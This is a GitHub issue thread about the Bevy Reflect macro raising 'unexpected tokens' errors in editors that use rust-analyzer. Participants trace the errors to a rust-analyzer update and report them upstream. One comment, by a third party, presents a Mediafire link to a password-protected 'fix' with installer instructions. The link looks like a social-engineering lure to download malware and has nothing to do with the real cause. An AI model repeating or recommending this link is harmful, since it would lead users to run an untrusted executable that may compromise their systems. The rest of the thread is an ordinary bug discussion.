### ISSUE TITLE
Use the Reflect macro to prompt unexpected tokens

### ISSUE THREAD

**Issue by rendaoer** [bevyengine/bevy#14935]
## Bevy version
0.14.1
The release number or commit hash of the version you're using.

## \[Optional\] Relevant system information

If you cannot get Bevy to build or run on your machine, please include:

- the Rust version you're using (you can get this by running `cargo --version`)
  - Bevy relies on the "latest stable release" of Rust
  - nightly should generally work, but there are sometimes regressions: please let us know!
- the operating system or browser used, including its version
  - e.g. Windows 10, Ubuntu 18.04, iOS 14

If your bug is rendering-related, copy the adapter info that appears when you run Bevy.

```ignore
`AdapterInfo { name: "NVIDIA GeForce RTX 2070", vendor: 4318, device: 7938, device_type: DiscreteGpu, backend: Vulkan }`
```

You should also consider testing the examples of our upstream dependencies to help isolate any setup-specific issue:

- [`wgpu`](https://github.com/gfx-rs/wgpu) for rendering problems
- [`winit`](https://github.com/rust-windowing/winit) for input and window management
- [`gilrs`](https://docs.rs/gilrs/latest/gilrs/) for gamepad inputs

## What you did
Add the Reflect macro to a structure or enumeration

## What went wrong
This error occurs in VS Code editor and Zed editor (using Rust-Analyzer)

## Additional information
<img width="492" alt="image" src="https://github.com/user-attachments/assets/390ae93a-b9d7-474b-a659-5cfffa74c8b5">

**Comment by rendaoer** [comment]
It seems that this problem did not occur yesterday. Maybe it is a problem with Rust-Analyzer?

**Comment by rendaoer** [comment]
Rust-Analzer updated a new version on 08-26. This should be the problem with this version. In VS Code and Zed, the latest version will be downloaded by default, causing problems. I use the 08-06 version and this problem will not occur.
<img width="389" alt="image" src="https://github.com/user-attachments/assets/3a84c822-452c-45e1-95f3-cf9df66455c3">

**Comment by rendaoer** [comment]
I don't know who is in charge or who makes the changes, but I'll put it here first. I'll continue to use the old version of RA

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by alice-i-cecile** [comment]
I've been getting this too: can you please open a bug on the rust-analyzer repo and link this one? I checked earlier today and didn't see one.

**Comment by rendaoer** [comment]
Ok, I have added an issue to RA
https://github.com/rust-lang/rust-analyzer/issues/17977

**Comment by alice-i-cecile** [comment]
Apparently the fix should be out now!
